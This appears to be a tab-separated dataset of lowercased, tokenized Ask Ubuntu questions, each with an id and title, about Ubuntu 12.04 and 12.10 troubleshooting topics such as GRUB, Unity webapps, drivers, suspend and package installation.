203570	gnome-tweak-tool not working on ubuntu gnome remix 12.10	i 'm experiencing some problems with ubuntu gnome remix 12.10 64 bits . my gnome-tweak-tool does n't apply themes properly . for the gtk themes , i noted that they are not fully applied . for example , i select elementary 's gtk theme and the window 's border ( metacity ? ) still with adwaita . the theme also looks weird , what led me to believe that there was some engine missing , but that was n't the case . the problem got bigger after a recent crash on my gnome-shell , when i had to use the command gnome-shell -- replace on terminal to get my environment back . now when i open gnome-tweak-tool , it does n't display the option of changing shell theme ( shows that icon as if i was on unity or other stuff ) . i do n't know if this is consequence of any recent update , but i 'm using gnome-shell 3.6.1 . i also have gnome3-team ppa installed . i hope you understand my english : (
203578	where do chrome , chromium and firefox store offline data	as the question says , where do each of the browsers store their offline data , be it cache , offline storage from html5 , images , flash videos or anything web related that gets stored locally .
203583	launcher icon do n't appear for certain apps in 12.10 , for example gnome-terminal .	after upgrading to 12.10 , several of my apps wo n't appear on the launcher , including eclipse and idea . they are not in the alt+tab switch list either , so i wo n't be able to switch to another app and switch back . i checked on this website and found no similar questions about 12.10 , so i re-install the 12.10 from scratch . but this problem still exists . and even gnome-terminal wo n't appear either ! anybody has similar problems ?
203585	how do i connect to an smb share requiring a user name and password ?	i have a samba share on my lan that requires a username and password to obtain write access ( otherwise it defaults to read-only ) . i ca n't figure out where in the unity desktop i can connect to the share and be prompted for my login credentials . i can mount the drive , of course , but then i 'm browsing as a guest ( read-only ) . what gives ?
203586	how do i install virtualbox-dkms ?	getting the following error when attempting to install the virtualbox kernel modules : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 4.1.18 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new virtualbox-4.1.18 dkms files ... building only for 3.5.0-17-generic module build for the currently running kernel was skipped since the kernel source for this kernel does not seem to be installed . i tried installing the linux-source package , but not sure how ubuntu handles kernel sources and headers . any ideas on how to do this from an ubuntu standpoint ?
203591	windows 7 loader missing	i just install ubuntu 12.10 along side windows 7.when booting it goes straight to ubuntu and skip grub.this problem occured since 12.04 on 11.10 everything went just fine . i run update-grub and windows 7 is not listed . extra : my partition sda2 is ext4 ubuntu 12.10 ( 46gb ) sda3 is swap swap file ( 4gb ) sda5 is ntfs windows 7 ( 50gb ) sda6 is ntfs everything ( 400gb )
203595	ubuntu 10.04 lts hangs at 43 % of starting up partitioning disks	i have set up hardware raid 1 with two sas drives using the adptec 6405e controller . i am having a problem when installing ubuntu 10.04 lts as it hangs at 43 % when partitioning disk drives . so far my googling suggests that ubuntu does not scan raided drives well . what can i do to finish my installation ?
203597	how do i run updatedb everyday ?	how do i edit update.conf at /etc/update.conf to run everyday ? this would enable me to use locate with a very recent database . i read this : default settig , updatedb , it has been in /etc/cron.daily and its name is slocate.cron if you want to run updatedb on startup , you can add the line updatebd to the file /etc/rc.d/rc.local . in fc4 you must edit the file /etc/updatedb.conf and set daily_update=yes . but thats for fedora .
203599	can not install accomplishments	i have tried to install ubuntu accomplishments on my clean 12.10 install . following the installation instructions as outlined here after entering the final command sudo apt-get install accomplishments-daemon accomplishments-viewer ubuntu-community-accomplishments ubuntu-desktop-accomplishments accomplishments-lens i get the following unable to locate package reading package lists ... done building dependency tree reading state information ... done e : unable to locate package accomplishments-lens i checked software sources and the ppa : was successfully added and no problems were shown after sudo apt-get update thanks in advance for any help
203601	how do i burn the ubuntu iso to a cd ?	how do i burn the latest 12.10 790 mb iso to a cd ? my burning software says insert a disk but 700 mb cd 's are too small . i tried a dvd and that did n't work either .
203604	check hash ( md4 , md5 , sha-1 , and crc ) on ubuntu 12.04 and 12.10	i have a lot of iso-files downloaded from internet . i want to check the hash from my ubuntu 12.04 and 12.10 . is there any application on ubuntu to check the md4 , md5 , sha-1 , and crc hash ? i need the crc hash-checker to check my windows 8 iso files .
203606	x broken after upgrading with an ati radeon card	i have an amd64 system with an onboard radeon hd4250 video card . after upgrading , unity fails to startu due to xorg problems . has anyone else had this problem ? how was it fixed ? any ideas ? ( i do n't have access to the computer at this time , or i would give more info . if any specific info would be helpful , please specify . ) i suspected it may be related in some way to information provided here : http : //www.ubuntuvibes.com/2012/10/how-to-enable-opengl-30-support-for.html which says that the proprietary drivers do not support quantal 's xorg 1.13/opengl 3.0 . i had been using proprietary drivers before the update . i have tried updating to the 3.6 kernel , but i did n't finish the process before having to let it be for the day , but i suspect more needs to be done . the article also mentioned that the hd2400-hd4290 may not even be opengl 3 compatible ? frankly , i do n't play many games , and i do n't care what opengl i 'm using so ... as long as it works for hd movies and regular us i 'm good . any suggestions on what direction i should look ?
203607	installed 12.10 , wo n't boot	i was running 12.04 without any problem on a dell inspiron 6000 . i upgraded to 12.10 , but now it wo n't boot . i can get to bios and to the boot menu , but 12.10 simply wo n't boot . i can run it from the dvd , but not from the install on the hard drive .
203608	ca n't install ubuntu due to a problem with the media	i just tried to install ubuntu 12.10 by using usb device . i used universal usb installer to make my pen drive boot-able . but i am getting this error always . i already have 12.04 , but i want to replace it by 12.10 . is there any other way to install ubuntu 12.10 ? ? update : i tried with burning dvd , but getting same error . i do n't have free space so i am unable to upgrade also , is there way to install without using ubiquity ?
203614	grub menu resolution problem on ubuntu 12.10	when i cold boot ubuntu 12.10 , the grub menu font is stretched and the background does n't cover the entire screen , like it 's 640x800 resolution . if i reboot the grub menu is perfect , no font or size problems . i suspect i need to make some grub settings . i did not have this problem with ubuntu 12.04 . also i did an upgrade not a fresh install . i 've played with grub customizer and video drivers , to no avail .
203620	unpredictable behavior on first login after installing 12.04	i installed 12.04 . after first login i can see the ubuntu screen which does not respond as expected . it goes partially black when i press the super and freezes , and when i press ctrl+alt+t keys the terminal does not appear . i had the same version of ubuntu on this machine which is a sony vaio . had to reinstall as partition space on tmp was not sufficient . now i have 30gb on root ext4 , 5gb on swp and another 25gb on ext4 . i do not understand what has caused this issue suddenly . edit : on resetting unity i get this message ( i pressed ctrl+alt+f1 and then entered unity -- reset ) : ( compix:2172 ) : gcong-critical ** : gconf_client_add_dir : addertion gconf_valid_key ( dirname , null ) failed error 2012-10-21 unity.launcher.trashlaunvcericon.cpp:62 could not create file monitor for trash url : opetation not supported compiz ( core ) - warn : unhandled configurenotify on 0xc0009e compiz ( core ) - warn : this should never happen . you should probably file a bug about this .
203627	what does this string do in a unity lens ?	my question is based on this article . my wikipedia lens is working well and this article is very nice . but i do n't understand , what is this string doing : for article in self.wikipedia_query ( search ) : i want to link my lens with google ajax search api , but my code is do n't working .
203630	easy_install pygame not working due to `` linux/videodev.h : no such file or directory '' error	trying to install pygame through easy_install in ubuntu 12.10 and the errors it gives me this : continuing with `` setup.py '' warning : no files found matching 'readme.txt' no previously-included directories found matching '*/cvs' no previously-included directories found matching '*/*/cvs' src/mixer.c : in function ‘chan_set_volume’ : src/mixer.c:660:9 : warning : variable ‘result’ set but not used [ -wunused-but-set- variable ] in file included from /usr/include/python2.7/python.h:8:0 , from src/scrap.h:22 , from src/scrap.c:30 : /usr/include/python2.7/pyconfig.h:1161:0 : warning : `` _posix_c_source '' redefined [ enabled by default ] in file included from /usr/include/stdio.h:28:0 , from src/scrap.c:24 : /usr/include/features.h:215:0 : note : this is the location of the previous definition in file included from src/scrap.c:59:0 : src/scrap_x11.c : in function ‘_get_data_as’ : src/scrap_x11.c:567:17 : warning : pointer targets in assignment differ in signedness [ -wpointer-sign ] src/scrap.c : in function ‘initscrap’ : src/scrap.c:329:15 : warning : variable ‘mod’ set but not used [ -wunused-but-set-variable ] in file included from src/_camera.c:36:0 : src/camera.h:42:32 : fatal error : linux/videodev.h : no such file or directory compilation terminated . error : setup script exited with error : command 'gcc ' failed with exit status 1 and running : sudo ln -s /usr/include/linux/videodev2.h /usr/include/linux/videodev.h gives : continuing with `` setup.py '' warning : no files found matching 'readme.txt' no previously-included directories found matching '*/cvs' no previously-included directories found matching '*/*/cvs' src/mixer.c : in function ‘chan_set_volume’ : src/mixer.c:660:9 : warning : variable ‘result’ set but not used [ -wunused-but-set-variable ] in file included from /usr/include/python2.7/python.h:8:0 , from src/scrap.h:22 , from src/scrap.c:30 : /usr/include/python2.7/pyconfig.h:1161:0 : warning : `` _posix_c_source '' redefined [ enabled by default ] in file included from /usr/include/stdio.h:28:0 , from src/scrap.c:24 : /usr/include/features.h:215:0 : note : this is the location of the previous definition in file included from src/scrap.c:59:0 : src/scrap_x11.c : in function ‘_get_data_as’ : src/scrap_x11.c:567:17 : warning : pointer targets in assignment differ in signedness [ -wpointer-sign ] src/scrap.c : in function ‘initscrap’ : src/scrap.c:329:15 : warning : variable ‘mod’ set but not used [ -wunused-but-set-variable ] in file included from src/camera.h:20:0 , from src/camera_v4l2.c:22 : src/pygame.h:678:14 : warning : ‘pygame_c_api’ defined but not used [ -wunused-variable ] src/camera_v4l.c : in function ‘v4l_open_device’ : src/camera_v4l.c:29:29 : error : storage size of ‘cap’ isn’t known src/camera_v4l.c:30:23 : error : storage size of ‘buf’ isn’t known src/camera_v4l.c:51:24 : error : ‘vidiocgcap’ undeclared ( first use in this function ) src/camera_v4l.c:51:24 : note : each undeclared identifier is reported only once for each function it appears in src/camera_v4l.c:63:26 : error : ‘vidiocgmbuf’ undeclared ( first use in this function ) src/camera_v4l.c:30:23 : warning : unused variable ‘buf’ [ -wunused-variable ] src/camera_v4l.c:29:29 : warning : unused variable ‘cap’ [ -wunused-variable ] in file included from src/camera.h:20:0 , from src/camera_v4l.c:20 : src/camera_v4l.c : at top level : src/pygame.h:678:14 : warning : ‘pygame_c_api’ defined but not used [ -wunused-variable ] error : setup script exited with error : command 'gcc ' failed with exit status 1 exquise my brewity , currently in a programming competition !
203632	could not find a valid gem 'rails ' ( > = 0 ) in any repository	i am trying to install rails using the following command : sudo gem install rails and get the following error : error : could not find a valid gem 'rails ' ( > = 0 ) in any repository error : possible alternatives : rails i am using : ubuntu 12.04 lts my ruby version is ruby 1.9.3p0 ( 2011-10-30 revision 33570 ) [ x86_64-linux ] my gem version is $ gem -v 1.8.11 i have try some things that i found in the net like trying to update my gem version using the following command : gem update -- system but it throws me un error again : error : while executing gem ... ( runtimeerror ) gem update -- system is disabled on debian , because it will overwrite the content of the rubygems debian package , and might break your debian system in subtle ways . the debian-supported way to update rubygems is through apt-get , using debian official repositories . if you really know what you are doing , you can still update rubygems by setting the really_gem_update_system environment variable , but please remember that this is completely unsupported by debian . could you advice what should i try ?
203635	can not update 12.04 due to `` failed to fetch '' warning	i ca n't update my ubuntu 12.04 . i tried it from terminal , update manager and also from the synaptic package manager . the error is w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en_in unable to connect to 172.20.0.100:8080 : w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en unable to connect to 172.20.0.100:8080 : e : some index files failed to download . they have been ignored , or old ones used instead .
203638	`` mozilla_five_home not set '' zekr quran study software java error	i have installed zekr quran study software on ubuntu 12.04 and i upgraded to 12.10. then the zekr app has been giving me this error when ever i start it . org.eclipse.swt.swterror : no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] at org.eclipse.swt.swt.error ( swt.java:4387 ) at org.eclipse.swt.browser.mozilla.initmozilla ( mozilla.java:1939 ) at org.eclipse.swt.browser.mozilla.create ( mozilla.java:699 ) at org.eclipse.swt.browser.browser. < init > ( browser.java:99 ) at net.sf.zekr.ui.quranform.makeframe ( quranform.java:628 ) at net.sf.zekr.ui.quranform.init ( quranform.java:340 ) at net.sf.zekr.ui.quranform. < init > ( quranform.java:319 ) at net.sf.zekr.zekrmain.startzekr ( zekrmain.java:51 ) at net.sf.zekr.zekrmain.main ( zekrmain.java:94 ) please advice me
203639	unity crashed after upgrade from 12.04 to 12.10	i just upgraded my 12.04 to 12.10 and after restart i ca n't do anything . i can just use the console ( ctrl+alt+t ) . i ca n't move windows , there is no window bar , no top panel , no unity launcher . what i should do ? any help would be greatly appreciated . my pcs properties : intel® pentium ( r ) cpu g840 @ 2.80ghz × 2 geforce gts 450/pcie/sse2
203643	web apps do n't show up in launcher or messaging menu	i upgraded to 12.10 and i 'm excited to use the web apps feature but it 's not working ! i did everything by the book : sudo add-apt-repository ppa : webapps/preview sudo apt-get update sudo apt-get install unity-webapps-preview i integrated my online accounts and installed gmail web app on chromium ( version 22.0.1229.94 ) . i got in my password and the magic did n't happen . there 's an extension added to chromium but no gmail in messaging menu and no gmail icon on launcher . the same thing for facebook and youtube .
203645	how to give more ram to wine applications	hi i think my system is not allocating enough ram to wine applications . i am using wine to play games but they are loading slowly and ram usage is normal . so how can i improve reserve memory of wine ?
203651	recursive search broken in nautilus 3.6 on ubuntu 12.10	i really liked the look and feel of the new nautilus , so i installed from the gnome3-team/gnome3 ppa , but now i ca n't really search - it only finds things directly sitting in the current directory , and does n't traverse down the file tree . any suggestions ? also , the version on the ppa is 3.6.0 , but when i downloaded 3.6.1 from the project site and built from source , the same issue occurred .
203652	how can i add other online accounts ?	i 'm using ubuntu 12.10 and i 'd like to add other online account ( like qq , weibo ) in empathy or pidgin . how can i ?
203655	`` ata2 : link is slow to respond , please be patient '' during boot	i have a kingston sv100s264g solid-state drive in my lenovo thinkpad . ubuntu 12.04 was booting just fine until a few days ago , it started to boot very slowly . more like it did not want to boot up normally but in recovery mode or with a livecd . error : ata2 : link is slow to respond , please be patient ( ready=0 ) this happens to me three times , then it says : ata2 : link is set to 1.5 gbps ( or something like that ) i do not know what caused this or how to fix it . also this problem is not allowing me to install ubuntu 12.10 or 12.04 . my question is , this is a bug that can be fixed or is my drive physically broken ? update : it seems that i can install windows 7 just fine but ubuntu will give me this error . it means that it has to be a bug then . but what is it ? update 2 : i have brought new solid state hard drive and new memory ( i did a mem test and it keeps on failing test # 7 ) and i 'm still hitting this error . also i 'm getting the softlink restart error ( or something like that ) along with this error . update 3 : i think i need to update the bios .
203657	getting started with cloud development using openstack	i have a few ideas for cloud apps that i want to play with , and i do n't want to pay for amazon aws or anything like that . also , i do n't want my projects to be in any way exposed to the general internet while they 're still half-baked . here 's what i have to work with : 1 quad-core machine that acts as a file server , dhcp server , and dns server . i am ok with letting maas handle dhcp and dns on my network . i am not ok with reinstalling the os in a special configuration . 1 quad-core machine that can be freely reinstalled or whatever . so far , i 've installed maas on the first machine ( although it seems i 'm getting bitten by bug # 1067929 still , despite my use of the workaround ) , added the second machine as a node , and ( apparenlty ) commissioned it . maas lists the status of the second machine as `` allocated to root '' ( root being my maas user ) . juju , however , obstinately refuses to do anything . running it from my laptop ended in failure because apparently it ca n't handle maas with an https url . running it on the first machine using http gets further , but bootstrapping fails because `` no matching node is available . '' research suggests that juju needs at minimum 2 actual , physical machines , but i have yet to see an adequate explanation of why . ( i have to say , i 'm rather intrigued by maas . with a bit more work ( especially in qa ) , it looks like it could be the centralized machine management platform i 've been looking for . ) so , now i find myself looking at devstack . i ca n't say i 'm particularly thrilled by the idea of downloading some script off github and running it as root , but that seems to be the least painful path . is devstack really the way to go ? does it work with ubuntu 12.10 ? does it handle routing and dns automatically ? ( i would rather not have to fiddle with bind9 configuration files every time i create a new cloud vm , and i would rather not have to fiddle with iptables at all . )
203675	how to make hidden windows show up in alt-tab box	i 'm trying to get a 'show desktop ' shortcut to work , so i 'm using 'hide all windows ' shortcut to show the desktop . but after it hides the windows , i can no longer alt-tab through them , and i have to manually click on the unity bar to get back . i would like alt-tab to switch through all of the applications open in my current workspace ( including hidden ones )
203679	which package of mysql should i choose from the software center ?	when installation mysql in ubuntu software center there are two programs mysql server mysql client whichever is chosen for the installation mysql
203682	how to make my own web app	after switching to ubuntu 12.10 , i have discovered i like the web app 's feature . i do not , however , like the gwibber application , or twitter.com ( and it 's web app ) because of lack of features . i do , however , like the twitter client hotot , but for some reason , is not working for me right now . i was wondering if there was a way i could make web.tweetdeck.com a web app , until i can get hotot working for me ? thank you !
203688	again problem with youtube fullscreen on dual monitors	my problem is same ( i think ) to how to make youtube fullscreen actually fullscreen ? and i tried to enable\disable html 5 , but it does n't fix the problem . what should i do ? sorry if it 's a stupid question , but i do n't know how to fix that , i 've been searching for 2 hours , but the problem is still unsolved : (
203690	where can i find a driver for a broadcom device 4365 wireless card ?	my laptop ( dell inspiron 17r 5720 ) came with preinstalled ubuntu 11.10 . i removed it and installed 12.04 . now i ca n't find driver for wireless . apparently , in 11.10 there was broadcom-sta driver . but in 12.04 there is no additional drivers to install . i tried using : sudo m-a a-i broadcom-sta but building fails on 26 % . how can i install driver ? according to lspci i got : broadcom corporation device 4365 ( rev 01 )
203693	unity web apps make seperate window named untitled in chrome	note : not chrome web apps ... unity web apps as introduced in 12.10 ... when i make a web app after installing the chrome extensions for unity web apps and online accounts , it opens a web app in a new window ... seems fine . however it makes two window icons on the unity launcher even though only one window is open ... their is one with the app icon which is expected ... then their is a icon named untitled which is all my unity web apps open ... the icon is sometimes the chromium icon and sometimes the square question mark icon . how do you fix this ?
203694	i disabled login options , how do i reset my password ?	so yesterday i changed password on ubuntu , but today i wanted to revert it so i entered user accounts and tried to change it , but sadly i could not . it told me password is not secure enough or something then i disabled log in options , but i want it back as it was i can not use sudo as i do n't know what password to enter . now i can not change password at all any way to make it as it was ?
203697	upstart service stops when i log out	i 've written an upstart script i want to run when my server starts up , only it does not . it will run when i call sudo start wiki , where wiki is the name of my service , however it stops running when i log out . this is the script : description `` run the noplwiki web service '' start on runlevel [ 2345 ] script logfile= '' /var/log/wiki.log '' source= '' /home/matt/python/noplwiki/ '' exec > > $ { logfile } 2 > & 1 . /home/matt/.virtualenvs/noplwiki/bin/activate cd $ { source } exec python wiki.py end script this is the log file for when i start it when i 'm logged in , request something from the service and then log out : [ 20/oct/2012:18:27:28 ] engine listening for sighup . [ 20/oct/2012:18:27:28 ] engine listening for sigterm . [ 20/oct/2012:18:27:28 ] engine listening for sigusr1 . [ 20/oct/2012:18:27:28 ] engine bus starting [ 20/oct/2012:18:27:28 ] engine started monitor thread '_timeoutmonitor ' . [ 20/oct/2012:18:27:28 ] engine started monitor thread 'autoreloader ' . [ 20/oct/2012:18:27:29 ] engine serving on 0.0.0.0:8080 [ 20/oct/2012:18:27:29 ] engine bus started 192.168.1.64 - - [ 20/oct/2012:18:27:41 ] `` get / http/1.1 '' 200 699 `` '' `` mozilla/5.0 ( windows nt 6.1 ; wow64 ; rv:16.0 ) gecko/20100101 firefox/16.0 '' 192.168.1.64 - - [ 20/oct/2012:18:27:41 ] `` get /js/index.js http/1.1 '' 304 - `` http : //192.168.1.66:8080/ '' `` mozilla/5.0 ( windows nt 6.1 ; wow64 ; rv:16.0 ) gecko/20100101 firefox/16.0 '' [ 20/oct/2012:18:27:51 ] engine restarting because /home/matt/.virtualenvs/noplwiki/local/lib/python2.7/site-packages/pymongo/helpers.py changed . [ 20/oct/2012:18:27:51 ] engine stopped thread 'autoreloader ' . [ 20/oct/2012:18:27:51 ] engine bus stopping [ 20/oct/2012:18:27:51 ] engine http server cherrypy._cpwsgi_server.cpwsgiserver ( ( '0.0.0.0 ' , 8080 ) ) shut down [ 20/oct/2012:18:27:51 ] engine stopped thread '_timeoutmonitor ' . [ 20/oct/2012:18:27:51 ] engine bus stopped [ 20/oct/2012:18:27:51 ] engine bus exiting [ 20/oct/2012:18:27:51 ] engine bus exited [ 20/oct/2012:18:27:51 ] engine waiting for child threads to terminate ... [ 20/oct/2012:18:27:51 ] engine re-spawning wiki.py traceback ( most recent call last ) : file `` wiki.py '' , line 46 , in < module > cherrypy.quickstart ( server ( ) , '/ ' , conf ) file `` /home/matt/.virtualenvs/noplwiki/local/lib/python2.7/site-packages/cherrypy/__init__.py '' , line 161 , in quickstart file `` /home/matt/.virtualenvs/noplwiki/local/lib/python2.7/site-packages/cherrypy/process/wspbus.py '' , line 332 , in block file `` /home/matt/.virtualenvs/noplwiki/local/lib/python2.7/site-packages/cherrypy/process/wspbus.py '' , line 376 , in _do_execv oserror : [ errno 2 ] no such file or directory : '/home/matt/python/noplwiki' why does it shut down when i log out ? as far as i can tell the helpers.py file has not been changed . -rw-rw-r -- 1 matt matt 7350 oct 15 20:32 /home/matt/.virtualenvs/noplwiki/local/lib/python2.7/site-packages/pymongo/helpers.py
203701	will an ati 5650 radeon cause issues in 12.10	seeing so many users failing to load up unity and facing graphical issues with quantal , should i be worried as my system has an ati radeon 5650 mobility card . ps-on another note , how do i still keep the ppas after upgrade ?
203709	how do i install myunity on 12.10 ?	basically as is the title how do you install myunity on 12.10 ? i 've tried adding the repository ppa : myunity/ppa and performing : sudo add-apt-repository ppa : myunity/ppa sudo apt-get update sudo apt-get install myunity at which point i received the error : w : failed to fetch http : //ppa.launchpad.net/myunity/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
203717	constant green screen with usb to dvi adapter	i am trying a triplehead configuration . i already have two monitors working perfectly , but the adapter one is just green . i 've done a bunch of things trying to get it to work : created a udev rule jon @ ubuntu : cat /etc/udev/rules.d/70-persistent-displaylink.rules # this rule will not work gracefully if more than one usb displaylink adapter is present # kernel== '' fb [ 0-9 ] * '' , attr { name } == '' udlfb '' , symlink+= '' usbvideocard '' kernel== '' fb1 '' , attr { name } == '' udlfb '' , symlink+= '' usbvideocard '' which creates /dev/usbvideocard pointing to /dev/fb1 installed xserver-xorg-video-displaylink added a modprobe file jon @ ubuntu : cat /etc/modprobe.d/50-displaylink.conf options udlfb fb_defio=1 built xf-video-udlfb , which put displaylink_drv.la and displaylink_drv.so into /usr/local/lib/xorg/modules/drivers edited xorg.conf section `` device '' identifier `` intel '' driver `` intel '' endsection section `` device '' identifier `` dl0 '' driver `` fbdev '' option `` fbdev '' `` /dev/usbvideocard '' option `` shadowfb '' `` off '' endsection section `` monitor '' identifier `` monitor0 '' endsection section `` monitor '' identifier `` monitor1 '' endsection section `` monitor '' identifier `` monitor2 '' endsection section `` screen '' identifier `` screen0 '' device `` intel '' monitor `` monitor1 '' endsection section `` screen '' identifier `` screen1 '' device `` intel '' monitor `` monitor2 '' endsection section `` screen '' identifier `` screen2 '' device `` dl0 '' monitor `` monitor0 '' depth 16 subsection `` display '' depth 16 modes `` 1280x1024 '' endsubsection endsection section `` files '' modulepath `` /usr/local/lib/xorg/modules '' endsection section `` serverlayout '' identifier `` multihead '' screen 0 `` screen2 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen0 '' rightof `` screen1 '' endsection i had this working for a little while , then something happened and it broke again . it 's really driving me nuts .
203719	wine virtual drive set to network location ?	i 've currently got all of my music saved on a nas server , and want to play it on my ubuntu machine as well as windows , which works fine using linux music software . the problem is i 'm so obsessed with foobar2000 ( windows music player ) , that i 'd rather have that running under wine to play music on . if i try to create a virtual drive in wine pointing to the network location it does n't work , foobar2000 ca n't find any music there . alternatively , if i create a samba share of my local music folder , wine recognises the location and i can play music from there , and i can also access the folder from windows . this works great , but i 'd rather be storing my music on the nas server . so , is there any way i can integrate a remote network location into wine , so that programs in wine can access the network ? like how i 'm using the samba share , but files stored on a server ?
203724	webapps does n't show up	i have chosen some of the available webapps to integrate to my ubuntu 12.10 , but none of them are functioning . i tried doing this from firefox and also by installing unity-webapps-* directly . but i got nothing . what should i do ?
203725	no icons or anything on desktop	i am new to ubuntu , just installed ubuntu 12.10 on a laptop just ubuntu no windows when install is finish and reboot it will ask for me to log in . after that only shows wallpaper , no icons , functions , or menu bars .
203727	libreoffice spell checker does n't work ?	i was a little surprised to discover that in libreoffice ( 3.5.4.2 ) , the spell check does n't actually work . i was surprised since spell checkers have been around since ... .80 's ? not a difficult thing . i am running ubuntu 12.04 , on a relatively new install . i have n't done anything to my dictionaries or language files . under tools > options > languages > writing aids , i have the option selected to check as i type and to use the english dictionaries . however , i get no errors when i type spelling mistakes on purpose , and when i run the checker it just says the spell check has completed and closes the window . is this a bug with libre ? or have i done something wrong ?
203728	shade effects not working ubuntu 12.10	apologies if this has been asked elsewhere . despite the option still being available in ccsm , shade effects are apparently broken in 12.10 i 'm not using the unity plugin ( because it still sucks ) instead making do with cario-dock for my interfaces . is there are work around for this ? i 've tried going through ubuntu tweak but it is n't working with 12.10 ( and probably wo n't support it in the future as tweak appears to have bitten the dust ) i 've only recently dragged myself upto date from 10.10 and i 'm not seeing much to keep my attention .
203730	problem with dell 14z 3d acceleration on ubuntu 12.04	i just bought a dell 14z ( in brasil ) and installed the latest long term ubuntu ( 12.04.1 ) . i managed to get the aditional ati/amd installed . the problem is that it will not work with 3d acceleration for some reason . when i log in after installing i can not use the unity 3d interface and it defaults to the 2d version . i have tried many re-install versions on the web but none have worked . if i remove the driver the unity 3d interface works fine with the generic driver but i am having issues setting resolutions when i use the hdmi output for example . does anyone have any idea how to fix this ? the card seems to be a amd hd 7570m .
203736	where does webcam stores clicked images ?	i clicked a picture from my webcam while installing ubuntu . i can see that picture when i am being prompted for a password . i want that picture of mine . so my question is , where can i find the images clicked by my webcam . ankit @ stream : /var/lib/accountsservice/icons $ ls -l total 0 ankit @ stream : /var/lib/accountsservice/icons $ edit : - 1 ankit @ stream : /var/lib/accountsservice/users $ cat /var/lib/accountsservice/users/ankit [ user ] xsession=ubuntu xkeyboardlayouts= background=/usr/share/backgrounds/smile_by_quinn.anya.jpg ankit @ stream : /var/lib/accountsservice/users $
203740	how to prevent `` unlock login keyring '' pop up window on login ?	every time i log into ubuntu 12.10 it shows a pop up window prompting me to `` unlock login keyring '' . how do i prevent that popup ? suggestions presented on this site did not work on ubuntu 12.10
203744	video introduction to linux command line	i 've been using ubuntu for like 3 years as my main os . i 've used terminal many many times but never have i deeply understand it . i run commands , i 'm familiar with the basic ones , but i want to dig deeper . is there any video introduction ( i like to lay back and watch tutorials instead of reading books ) to novice-intermediate to advanced command line ? thank you .
203745	suspend breaks on 12.10 's kernel	i just installed installed 12.10 , and suspend is not working . here are more details : when i select suspend from the power menu , the screen goes black ( with the monitor still running ) , but the computer is still running . num lock works , but caps lock does n't work [ * ] . the computer never enters suspend mode , but i ca n't get the monitor to respond either . the only way i can get out of this situation is to shut down the machine by holding the power button . when i forcefully reboot it , i get the message `` ubuntu 12.10 has encountered an internal error '' . apparently something is wrong with apportcheckresume . i googled a bit and found this launchpad bug report . i installed the amd64 kernel from here ; on this new kernel suspend works . but there are no drivers , so it 's not a solution . so , the question is : how do i fix suspend on the current kernel ( 3.5.0-17-generic ) ; or how do i install drivers on the mainline kernel ? a solution to either will solve the problem . -- [ * ] how to debug suspend ? seem to suggest this is a kernel hang ?
203748	how do i make a .sh file run in terminal by default - problem using .desktop file	i have a small .sh file which i use to convert batches of picture files . i just copy this little file into the folder and run it to convert all the pictures in the folder . this works great but it bugs me that it brings up the `` run in terminal/display/run '' option every time . i tried creating a .desktop file as seen on other posts , named convertpics.desktop : [ desktop entry ] type=application name=convertpics exec='/fullpath_to_script/convertpics.sh' terminal=true i then set the convertpics.desktop file to executable . now when i double click the convertpics.desktop ( now shown just as convertpics ) it does run the script but it runs it in my home folder rather than the folder i am in . is there a way to make it use the current folder as the working folder ?
203749	no mobile broadband wizard with a gobi2000	my details : thinkpad t410 gobi 2000 wwan ubuntu 12.10 with gnome3 in ubuntu 12.04 , debian squeeze and debian wheezy my gobi2000 works like a charm but in ubuntu 12.10 the connection wizard does n't show up . i configured the card the normal way : added thnkpad ppa install gobi-loader-tp copied firmware files to /lib/firmware/gobi/ ( the same files work under debian ) the card is correctly recognized and my sim is detected too . the only problem is when i try to setup a new connection the wizard does n't start . simply nothing happens . any idea ?
203750	chrome or chromium ?	after installing ubuntu 12.10 on my laptop , i went to download chrome and got an error saying it was packaged badly or something , so i read up about it and found out about chrome , and most people suggest that ubuntu users should use chromium over chrome , although a lot is down to preference . i read that chromium is almost a 'beta ' build for chrome , but is quicker etc . as it has the newest features . is it still safe to use , for say banking etc. ? should i ignore the error and just get chrome anyway ? what do you use ?
203757	i recently have installed ubuntu 12.10 onto my computer	yes , the title says it all . but there are problems . when i start the computer , ubuntu boots properly , and takes me to the log in screen , however , once i 've logged in and am taken to my desktop , there is nothing except the default wallpaper and my mouse . there is no unity sidebar , nor title bar . i can right click and access that particular menu , but that 's it .
203763	how to launch apps installed from ppa ?	i have installed a few apps from the terminal by adding repositories and running commands but how do i access them ? they are n't in the launcher and i ca n't see them in the dash either . i 'm running ubuntu 12.10 . i ran the following lines of code : sudo add-apt-repository ppa : yorba/ppa sudo apt-get update & & sudo apt-get install geary
203770	nautilus opens devices on every log in	each and every time i log in to ubuntu 12.10 nautilus opens and opens my two mounted hard drives in devices , one after the other , in separate nautilus windows . this would n't be too much of a problem , however nautilus seems very unstable in 12.10 and frequently hangs anyway when browsing files . so when this happens i see my desktop for about 1-2 seconds and then before i have chance to do anything , it opens the first device in the file manager , hangs , then the second , hangs , and then i am waiting an extra 30s before i can actually use my desktop . fortunately i just have the two devices set to auto mount on boot . how do i stop ubuntu from opening these devices every login ? no other version did this , from 12.04 backwards . thanks for the help .
203773	fresh install of ubuntu 12.10 wo n't boot on asus x101ch eee pc	i did a fresh install of ubuntu 12.10 in my asus x101ch eee pc , using a live usb which i made using startup disk creator , replacing ubuntu 12.04 . the installation ran smoothly , but when i boot , it goes to a purple screen for a second , then a lot of text like the following shows up in sequence : starting crash report submission daemon [ ok ] starting cpu interrupts balancing daemon [ ok ] stopping save kernel messages [ ok ] _ and the cursor just keeps blinking for hours . i ca n't log in . pressing alt + f2 did not bring me to console mode . i thought it might be a partition problem so i formatted the whole disk , by creating a new partition table using gparted in ubuntu 12.04 live usb . i noticed that i ca n't try ubuntu using 12.10 live usb either ; it just went to a blank screen when i hit the 'try ubuntu ' button . but the same problem arose . i even changed the pen drive for the live usb a couple of times . i happened to know that the intel atom n2600 cedar trail cpu in my computer is not well supported in linux , i managed to install its drivers in ubuntu 12.04 , although the computer went blank during the installation .
